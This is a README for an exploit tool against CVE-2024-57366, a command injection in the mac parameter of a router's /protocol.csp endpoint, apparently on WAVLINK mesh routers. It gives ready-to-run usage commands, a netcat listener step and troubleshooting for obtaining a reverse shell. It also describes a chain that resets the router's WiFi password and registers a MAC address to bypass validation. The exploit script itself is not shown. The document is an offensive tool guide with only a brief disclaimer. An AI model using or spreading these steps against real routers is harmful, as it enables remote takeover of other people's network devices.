# CVE-2024-57366 Exploit

A robust exploit for CVE-2024-57366 that allows remote code execution on vulnerable routers through MAC address validation bypass and command injection.

This is a post-authorization exploit that requires the router "Remote Control" feature to be on, and the administrative password. The administrative
user name is hardcoded to "admin".

## 🚀 Features

- **Automatic MAC address registration** - Connects to WiFi to register MAC address with router
- **Network-preserving exploit** - Maintains your existing network connections during exploit
- **MAC address caching** - Fast repeat exploits using cached successful MAC addresses
- **BurpSuite-compatible** - Matches exact request format for maximum reliability
- **Timeout handling** - Helpful messages when reverse shell connections are expected
- **User-friendly** - Simple text-based MAC address cache for easy management

## 📋 Requirements

- Python 3.6+
- Linux system with wireless adapter
- `sudo` access (required for network interface management)
- Target router vulnerable to CVE-2024-57366

## 🛠️ Installation

1. Clone or download the exploit files
2. Ensure you have the required Python packages:
   ```bash
   pip3 install requests
   ```

## 🎯 Usage

### Basic Exploit (First Time)

```bash
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
```

### Quick Exploit (Using Cached MAC)

```bash
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"
```

### Force Full Exploit (Skip Cache)

```bash
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
```

### List Cached MAC Addresses

```bash
python3 exploit.py --list-cached
```

## 📖 Command Line Options

- `--target` - Target router IP address (default: 127.0.0.1)
- `--port` - Target router port (default: 80)
- `--local-ip` - Your local IP address for reverse shell callback
- `--local-port` - Local port for reverse shell callback (default: 4444)
- `--password` - Router admin password
- `--ssid` - WiFi network name (default: WAVLINK-Mesh_DC4B)
- `--force-full` - Force full exploit, skip cached MAC check
- `--list-cached` - List cached MAC addresses and exit

## 🔧 How It Works

### Technical Overview

CVE-2024-57366 exploits a MAC address validation bypass in router firmware. The vulnerability allows command injection through the `mac` parameter in the `/protocol.csp` endpoint.

### Exploit Process

1. **Authentication** - Extracts authentication token from router
2. **WiFi Password Reset** - Resets router WiFi password to match admin password
3. **MAC Registration** - Connects to WiFi to register MAC address with router
4. **Command Injection** - Injects reverse shell payload using registered MAC
5. **Network Preservation** - Maintains existing network connections throughout

### Key Technical Details

- **MAC Validation Bypass**: Router validates MAC addresses by checking if they've connected to WiFi
- **Network Interface Binding**: Uses `eth0` interface to preserve original network context
- **Request Format**: Matches BurpSuite format exactly (`index=1`, token in URL path)
- **Payload**: Netcat reverse shell with named pipe for reliability

### MAC Address Caching

The exploit automatically caches successful MAC addresses in `successful_macs.txt`:

```
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
```

**Manual MAC Addition**: Edit `successful_macs.txt` and add lines like:
```
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
```

## 🎯 Example Usage

### First Exploit Attempt

```bash
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"
```

### Subsequent Exploits (Much Faster)

```bash
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC
```

## 🔍 Troubleshooting

### Common Issues

1. **"No wireless adapters found"**
   - Ensure you have a wireless adapter enabled
   - Check that WiFi is turned on
   - Try running with `sudo`

2. **"MAC address validation failed"**
   - The MAC address needs to be registered with the router
   - Ensure the WiFi connection step completed successfully
   - Try connecting to WiFi manually first

3. **"Request timed out"**
   - This might actually mean the exploit worked!
   - Check your netcat listener for a reverse shell connection
   - The router might be executing the command but not responding to HTTP

4. **"Reverse shell not connecting"**
   - Verify your `--local-ip` is correct (use `ip addr show eth0`)
   - Ensure no firewall is blocking the connection
   - Check that netcat listener is running on the correct port

### Network Requirements

- **eth0 interface**: Must have an IP address for network preservation
- **Wireless adapter**: Required for initial MAC registration
- **Router access**: Must be able to reach router via eth0 interface

## 📁 File Structure

```
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file
```

## ⚠️ Disclaimer

This tool is for educational and authorized testing purposes only. Only use on systems you own or have explicit permission to test. The authors are not responsible for any misuse of this tool.

## 🔗 References

- [CVE-2024-57366](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57366)
- Router firmware vulnerability in MAC address validation
- Command injection through `/protocol.csp` endpoint

## 📝 License

This project is provided as-is for educational purposes. Use responsibly and in accordance with applicable laws and regulations.